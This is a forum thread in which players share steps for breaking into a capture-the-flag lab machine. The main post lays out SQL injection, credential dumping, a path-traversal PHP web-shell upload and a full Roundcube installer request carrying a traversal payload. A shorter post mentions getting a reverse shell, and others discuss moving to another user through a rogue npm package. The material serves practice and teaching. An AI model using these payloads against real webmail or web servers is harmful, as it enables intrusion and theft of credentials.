Anyone managed to find kavi's password in mark's shell after the patch?

June 28, 2022 at 11:36 PM
For shell.php, put filename=../filename.php to get a rev shell.

(June 5, 2022, 09:04 AM)coolbyte Wrote: Just to make the point of the situation for the people late to the party.
Almost none of the main steps described in the first pages of this thread still work, the machine has been patched 5 days ago.
The steps so far are:
1. Discover exam subdomain
2. SQLi on the id parameter
3. Dump student credentials from DB
4. Login into student panel
5. Upload malicious shell, BUT, you need to modify the stud_no parameter to "31234/.." , because PHP execution inside the 31234 folder is blocked
6. You can trigger the shell directly through seventeen.htb:8000/oldmanager/files/shell.php OR it can be triggered through a CVE of Roundcube. Obviously it doesn't make sense to complicate the situation, but I have a hunch that the Roundcube CVE was supposed to be the intended way, and that the machine maker just messed with the .htaccess file. So most likely the steps were supposed to be:
6.1 Go to mailmaster.seventeen.htb:8000/mailmaster/installer/
6.2 Upload a new configuration, where you will intercept and modify one of the _plugins_NAME parameters
_step=2&_product_name=Seventeen+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Ftemp%2F&_des_key=iajOofMkjvHYKGsQZzdASvEh&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=127.0.0.1&_dbname=roundcubedb&_dbuser=mysqluser&_dbpass=mysqlpassword&_db_prefix=&_default_host%5B%5D=127.0.0.1&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=127.0.0.1&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_example_addressbook=example_addressbook&_plugins_filesystem_attachments=filesystem_attachments&_plugins_help=../../../../../../../../var/www/html/oldmanagement/files/31234&submit=UPDATE+CONFIG
This will make roundcube load a file at path /var/www/html/mastermailer/plugins/../../../../../../var/www/html/oldmanagement/files/31234/../../../../../../var/www/html/oldmanagement/files/31234.php, which means that both the path 31234 and the file called 31234.php need to exist at the same level.
7. Once a shell is obtained in the container, you can find the credentials for Mark in the dbh.php file
8. SSH into the box as Mark
Here is where I stopped.
- The file where other users have previously found the password for kavi user is not readable anymore
- The /opt/app/node_modules/ directory is not writeable anymore, so the rogue JS package cannot be just written there
- There is a Verdaccio registry locally at port 4873. I am assuming that we should find a way to publish packages through it, but user registration is disabled and no anonymous publishing is allowed (and neither mark nor kavi have access to it). The configuration of verdaccio is not even readable (/etc/verdaccio).
- There is a whole mail stack on the machine, it is really strange that it would be completely useless for the machine to be solved.
- There is another web app on port 31225, and I am not sure what it is.
If someone finds a legit way to get the password for the kavi user (i.e., not just from /opt/app/node_modules/db-logger/), it would be nice. I am giving up on this machine because it seems to be really poorly made and at this point it is just a waste of time without much learning. Thank you!

How did you discover the student panel? And how did you find mark as the username?

(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:
Folder /home/kavi/.npm is empty. And where is file package.tgz? Thanks.
................

(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:
Folder /home/kavi/.npm is empty. And where is file package.tgz? Thanks.
yes

(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:
Folder /home/kavi/.npm is empty. And where is file package.tgz? Thanks.
thanks

July 26, 2022 at 12:58 PM
(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:
Folder /home/kavi/.npm is empty. And where is file package.tgz? Thanks.
Thanks.